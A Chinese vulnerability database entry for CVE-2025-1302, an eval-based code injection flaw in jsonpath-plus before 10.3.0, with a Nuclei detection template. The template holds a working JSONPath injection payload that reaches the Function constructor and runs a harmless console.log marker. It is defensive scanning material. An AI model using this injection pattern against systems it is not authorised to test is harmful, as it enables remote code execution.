漏洞信息
漏洞名称: jsonpath-plus Safe Eval RCE Vulnerability
漏洞编号:
漏洞类型: 代码注入
漏洞等级: 高危
漏洞描述: 受影响的产品是jsonpath-plus,一个用于处理JSONPath表达式的JavaScript库,广泛应用于Web应用程序中,用于查询和操作JSON数据。该库在版本低于10.3.0时存在一个代码注入漏洞。漏洞的技术根源在于使用了不安全的eval()函数来处理JSONPath表达式,这允许攻击者通过构造恶意的JSONPath表达式注入并执行任意JavaScript代码。这种漏洞的利用可以导致远程代码执行(RCE),攻击者无需认证即可利用此漏洞,从而完全控制受影响的系统。由于jsonpath-plus的广泛使用,此漏洞对许多依赖该库的Web应用程序构成了严重的安全威胁。
产品厂商: JSONPath-Plus
产品名称: jsonpath-plus
影响版本: <10.3.0
来源: https://github.com/projectdiscovery/nuclei-templates/blob/bd32418a8ba4064b16c36852918a990265a4ccd4/http%2Fcves%2F2025%2FCVE-2025-1302.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53
| id: CVE-2025-1302
info: name: jsonpath-plus <10.3.0 - Safe Eval RCE Detection author: Jaenact severity: high description: | This template detects CVE-2025-1302 in jsonpath-plus (<10.3.0) using a safe eval()-based payload. The payload uses harmless JavaScript (console.log) to determine if unsafe evaluation occurs. This is a non-exploitive template suitable for safe security testing. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-1302 - https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585 - https://github.com/JSONPath-Plus/JSONPath - https://github.com/EQSTLab/CVE-2025-1302
tags: cve,rce,jsonpath,eval,safe,json,application,js
http: - method: POST path: - "{{BaseURL}}/query" - "{{BaseURL}}/jsonpath" - "{{BaseURL}}/api/query" - "{{BaseURL}}/data" - "{{BaseURL}}/parse" - "{{BaseURL}}/filter" - "{{BaseURL}}/expression"
headers: Content-Type: application/json
body: | { "path": "$..[?(EQST=''[['constructor']][['constructor']]('console.log(\"nuclei-safe\")');EQST())]" } matchers-condition: and matchers: - type: word part: body words: - 'nuclei-safe'
- type: word part: body negative: true words: - 'EQST' - '"path"'
|